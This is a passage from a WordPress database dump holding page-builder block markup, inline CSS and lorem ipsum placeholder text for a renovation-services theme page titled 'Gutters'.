}\n .skt-blocks-gallery.block-id-73265421-0369-4bd1-b7b6-c735abbd079f .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-73265421-0369-4bd1-b7b6-c735abbd079f .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-73265421-0369-4bd1-b7b6-c735abbd079f is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":30} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2c833901-b842-458d-bd55-f82c22e5338c\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2c833901-b842-458d-bd55-f82c22e5338c {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2c833901-b842-458d-bd55-f82c22e5338c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"f904279a-445a-493e-8118-6d165bf27627\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-f904279a-445a-493e-8118-6d165bf27627 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f904279a-445a-493e-8118-6d165bf27627 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f904279a-445a-493e-8118-6d165bf27627 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f904279a-445a-493e-8118-6d165bf27627 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-f904279a-445a-493e-8118-6d165bf27627.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f904279a-445a-493e-8118-6d165bf27627.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f904279a-445a-493e-8118-6d165bf27627.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f904279a-445a-493e-8118-6d165bf27627.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f904279a-445a-493e-8118-6d165bf27627.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a612b575-0cdf-45d6-a8be-65f31b8e3d6a\"} -->\n<style type=\"text/css\"> .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a612b575-0cdf-45d6-a8be-65f31b8e3d6a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"08e567b7-b230-4874-9818-b15e782b9bb4\"} -->\n<style type=\"text/css\"> .block-08e567b7-b230-4874-9818-b15e782b9bb4 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-08e567b7-b230-4874-9818-b15e782b9bb4 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-08e567b7-b230-4874-9818-b15e782b9bb4 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-08e567b7-b230-4874-9818-b15e782b9bb4 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-08e567b7-b230-4874-9818-b15e782b9bb4 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-08e567b7-b230-4874-9818-b15e782b9bb4\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"319aecdb-6790-41eb-9254-6173f7a75e2f\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-319aecdb-6790-41eb-9254-6173f7a75e2f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-319aecdb-6790-41eb-9254-6173f7a75e2f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-319aecdb-6790-41eb-9254-6173f7a75e2f .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-319aecdb-6790-41eb-9254-6173f7a75e2f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-319aecdb-6790-41eb-9254-6173f7a75e2f .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-319aecdb-6790-41eb-9254-6173f7a75e2f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Gutters','','inherit','closed','closed','','229-revision-v1','','','2022-08-22 19:24:18','2022-08-22 19:24:18','',229,'https://cteisys.com/?p=372',0,'revision','',0),(373,1,'2022-08-22 19:25:00','2022-08-22 19:25:00','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"e06103bb-1f76-411d-8965-9c096fc83e39\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-e06103bb-1f76-411d-8965-9c096fc83e39 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-e06103bb-1f76-411d-8965-9c096fc83e39.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-e06103bb-1f76-411d-8965-9c096fc83e39.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-e06103bb-1f76-411d-8965-9c096fc83e39.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e06103bb-1f76-411d-8965-9c096fc83e39.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e06103bb-1f76-411d-8965-9c096fc83e39.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-e06103bb-1f76-411d-8965-9c096fc83e39 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e06103bb-1f76-411d-8965-9c096fc83e39.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e06103bb-1f76-411d-8965-9c096fc83e39.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-e06103bb-1f76-411d-8965-9c096fc83e39 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e06103bb-1f76-411d-8965-9c096fc83e39.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d4c73368-f76c-46f2-a435-4cd9d0a0ba49\"} -->\n<style type=\"text/css\"> .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d4c73368-f76c-46f2-a435-4cd9d0a0ba49 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"877b65c9-a49d-47a5-b6a5-81fb9e4413fc\"} -->\n<style type=\"text/css\"> .block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-877b65c9-a49d-47a5-b6a5-81fb9e4413fc\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"40370995-237d-4910-9e7e-bf730523ea0c\"} -->\n<style type=\"text/css\"> .block-40370995-237d-4910-9e7e-bf730523ea0c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-40370995-237d-4910-9e7e-bf730523ea0c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-40370995-237d-4910-9e7e-bf730523ea0c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-40370995-237d-4910-9e7e-bf730523ea0c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-40370995-237d-4910-9e7e-bf730523ea0c .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-40370995-237d-4910-9e7e-bf730523ea0c\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"0f418c1e-e49c-4890-8c3d-eaf71da4329d\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f418c1e-e49c-4890-8c3d-eaf71da4329d .responsive-heading-seperator {\n 